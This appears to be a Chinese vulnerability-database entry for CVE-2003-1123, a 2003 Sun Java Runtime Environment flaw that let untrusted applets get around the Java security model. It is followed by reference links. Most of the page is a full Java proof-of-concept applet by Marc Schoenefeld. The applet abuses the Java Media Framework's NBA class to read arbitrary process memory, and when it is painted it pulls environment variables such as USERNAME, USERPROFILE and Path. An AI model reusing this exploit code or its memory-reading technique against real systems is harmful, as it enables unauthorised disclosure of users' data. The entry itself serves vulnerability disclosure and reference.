Sun Microsystems不可信Applet Java安全模型冲突漏洞

漏洞ID	1107368	漏洞类型	设计错误
发布时间	2003-06-05	更新时间	2005-10-20
CVE编号	CVE-2003-1123	CNNVD-ID	CNNVD-200312-467
漏洞平台	Multiple	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/22732
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-467

|漏洞详情

Solaris系统的JavaRuntimeEnvironment(JRE)为JAVA应用程序提供可靠的运行环境。JavaRuntimeEnvironment(JRE)允许不可Applet从可信Applet中访问信息，远程攻击者可以利用这个漏洞绕过Java安全模型访问受限资源。目前没有详细漏洞细节。

|漏洞EXP

source: http://www.securityfocus.com/bid/7824/info

It has been reported that the Sun Java Runtime Environment does not properly protect trusted java applets. Because of this, it may be possible for an attacker to use a malicious applet to gain access to sensitive information. 

/*
Proof-Of-Concept: Read Environment via vulnerability Java Media Framework
(2003) Marc Schoenefeld, www.illegalaccess.org

*/

import com.sun.media.NBA;
import java.applet.Applet;
import java.awt.Graphics;
import javax.swing.JOptionPane;
class NBAFactory {

		 		 public static String getEnv(String a,long from, long to) {
		 		 		 long pos = findMem(a,from,to);
		 		 		 String ret = "";
		 		 		 if (pos  != -1) {
		 		 		 		 long pos2 = pos+a.length();
		 		 		 		 ret = getString(pos2);
		 		 		 }
		 		 		 return ret;
		 		 }

		 		 public static String getString(long pos) {
		 		 		 int i = 0;
		 		 		 StringBuffer b = new StringBuffer();
		 		 		 char x = 0;
		 		 		 do {
		 		 		 		 x = (char) readMem(pos+i);
		 		 		 		 i++;
		 		 		 		 if (x != 0)
		 		 		 		 b.append(x);

		 		 		 } while (!(x == 0));
		 		 		 return b.toString();
		 		 }

		 		 public static long findMem(String a, long from , long to)  {
		 		 		 char[] ch = a.toCharArray();
		 		 		 for (long pos = from; pos < to ;pos++) {
//		 		 		 		 System.out.println(pos-from+":");
		 		 		 		 int i = 0;
		 		 		 		 int found = 0;
		 		 		 		 for (i = 0; i < ch.length; i++) {
		 		 		 		 		 char x = (char) readMem(pos+i);
//		 		 		 		 		 System.out.println(pos+":"+x);
		 		 		 		 		 if (x == ch[i]) {
		 		 		 		 		 		 found ++;
		 		 		 		 		 }
		 		 		 		 		 else
		 		 		 		 		    break;
		 		 		 		 }
		 		 		 		 if (found == ch.length) {
		 		 		 		 		 return pos;
		 		 		 		 }
		 		 		 }
		 		 		 return -1;
		 		 }

		 		 public static byte readMem(long i) {
		 		 		 byte[] by = new byte[1];
		 		 		 NBA searcher = new NBA(byte[].class,1);
		 		 		 long olddata = searcher.data;
		 		 		 searcher.data = i;
		 		 		 searcher.size = 1;
		 		 		 searcher.copyTo(by);
		 		 		 searcher.data = olddata; // keep the finalizer happy
		 		 		 return by[0];
		 		 }

		 		 public static void setMem(long i, char c) {
		 		 		 NBA b = new NBA(byte[].class,1);
		 		 		 long olddata = b.data;
		 		 		 b.data = i;
		 		 		 b.size = 1;
		 		 		 theBytes[c].copyTo(b);
		 		 		 b.data  = olddata; // keep the finalizer happy
		 		 }

		 		 public static void setMem(long i, byte by) {
		 		 		 setMem(i,(char) by);
		 		 }


		 		 public static void setMem(long i, int by) {
		 		 		 setMem(i,(char) by);
		 		 }


		 		 public static void setMem(long l, String s) {
		 		 		 char[] theChars = s.toCharArray();
		 		 		 NBA b = new NBA(byte[].class,1);
		 		 		 long olddata = b.data;
		 		 		 for (int i = 0 ; i  < theChars.length; i++) {
		 		 		 		 b.data = l+i;
		 		 		 		 b.size = 1;
		 		 		 		 theBytes[theChars[i]].copyTo(b);
		 		 		 }
		 		 		 b.data  = olddata; // keep the finalizer happy
		 		 }


		 		 private NBAFactory() {
		 		 }
		 		 public static NBA getByte(char i) {
		 		 		 return theBytes[i];
		 		 }

		 		 public static NBA getByte(int i) {
		 		 		 return theBytes[(char) i];
		 		 }

		 		 public static NBA[] getBytes() {
		 		 		 return theBytes;
		 		 }

		 		 static NBA[] theBytes = new NBA[256];
		 		 static {
		 		 		 for (char i = 0; i < 256; i++) {
//		 		 		 		 System.out.println((byte)i);
		 		 		 		 NBA n = search(i,0x6D340000L, 0x6D46A000L);
		 		 		 		 if (n!=null)
		 		 		 		 		 theBytes[i]= n;
		 		 		 		 else
		 		 		 		 		 System.exit(-1);
		 		 		 }
		 		 }

		 		 static NBA search (char theChar,long start, long end) {
		 		 		 NBA ret = null;
		 		 		 NBA searcher = new NBA(byte[].class,1);
		 		 		 byte[] ba = new byte[1];
		 		 		 for (long i = start; i < end ; i++) {
//		 		 		 		 byte b = readMem(i);
		 		 		 		 searcher.data = i;
		 		 		 		 searcher.copyTo(ba);
//		 		 		 		 if ( b == (byte)theChar) {
		 		 		 		 if ( ba[0] == (byte)theChar) {
		 		 		 		 		 return searcher;
		 		 		 		 }
		 		 		 }
		 		 		 return null;
		 		 }
		 }

public class ReadEnv extends Applet{

		 static NBA base = new NBA(byte[].class,18);  // what's the base pointer ?



		 public static void crash(Object o) {

		   System.out.println("Proof-Of-Concept: Read Environment via vulnerability Java Media Framework");

		   System.out.println("(2003) Marc Schoenefeld, www.illegalaccess.org");


		   NBA ret = new NBA(byte[].class,4);
		   long oldret = ret.data;

 		   System.out.println("Base of data: "+Long.toString(base.data,16));

		   String[] envs = {"USERDOMAIN","USERNAME","USERPROFILE","CLASSPATH",
		   		 "TEMP","COMSPEC","JAVA_HOME","Path","INCLUDE"};

		   for (int i = 0; i < envs.length; i++) {
		   		 String val = NBAFactory.getEnv(envs[i],base.data,base.data+32768);
		   		 if (!(o instanceof Applet)) {
		   		 		 System.out.println(envs[i]+":"+val);
		 		 }
		 		 else {
		 		 		 javax.swing.JOptionPane.showMessageDialog((java.applet.Applet) o,envs[i]+":"+val);
		 		 }
		   }


		   //NBAFactory.setMem(pos+10,'A');
		   try {
          System.out.println(System.getProperty("java.class.path"));
		   java.util.Properties p = System.getProperties();

		   p.list(System.out);
		   }
		   catch (java.security.AccessControlException e) {
		   		 System.out.println("Cannot read environment via getProperties:"+e);
		   }

		   //System.out.println(pos);

		   //long pos2 = NBAFactory.findMem("mixed",base.data,base.data+6614096);
		   //System.out.println(pos2);


		   //byte[] x11 = new byte[8];
		   //ret.copyTo(x11);
		   //for (int i = 0; i < x11.length; i++) {
		   //		 System.out.println(i+":"+x11[i]+(char)x11[i]);
		   //}



		   ret.data = oldret;

		   //ret.data = 0xffff8000;

		   //ret.finalize();
		   //ret.finalize();

		   //NBAFactory.setMem(ret.data-0xffff8000,33);


		   //ret.finalize();

		   /*b.data = base.data;
		   b.size = 16384;*/

		   /*byte[] ba3 = new byte[16384];
 		   b.copyTo(ba3);
		   for (int i = 0; i < ba3.length; i++) {
		   		 System.out.println(new Integer(i).toString(i,16)+":"+ba3[i]+(char)ba3[i]);
		   }*/

          /*b.data = olddata;*/



		 }

		 public static void main(String[] a) {
		 		 crash(null);
		 }

		 public void paint(Graphics g) {

		 		 if (init == 0) {
		 		 		 init=1;
		 		 		 crash(this);
		 		 }
		 }

		 static int init = 0;
}

|参考资料

来源:US-CERTVulnerabilityNote:VU#393292
名称:VU#393292
链接:http://www.kb.cert.org/vuls/id/393292
来源:BID
名称:7824
链接:http://www.securityfocus.com/bid/7824
来源:SUNALERT
名称:55100
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-55100-1
来源:XF
名称:sun-applet-access-information(12189)
链接:http://xforce.iss.net/xforce/xfdb/12189
来源:SECTRACK
名称:1006935
链接:http://securitytracker.com/id?1006935
来源:SECUNIA
名称:8958
链接:http://secunia.com/advisories/8958
来源：NSFOCUS
名称：4934
链接：http://www.nsfocus.net/vulndb/4934

相关推荐: FreeWnn JServer Logging Option Data Corruption Vulnerability

FreeWnn JServer Logging Option Data Corruption Vulnerability 漏洞ID 1100011 漏洞类型 Design Error 发布时间 2003-06-14 更新时间 2003-06-14 CVE编号 …

文章版权归作者所有，未经允许请勿转载。

THE END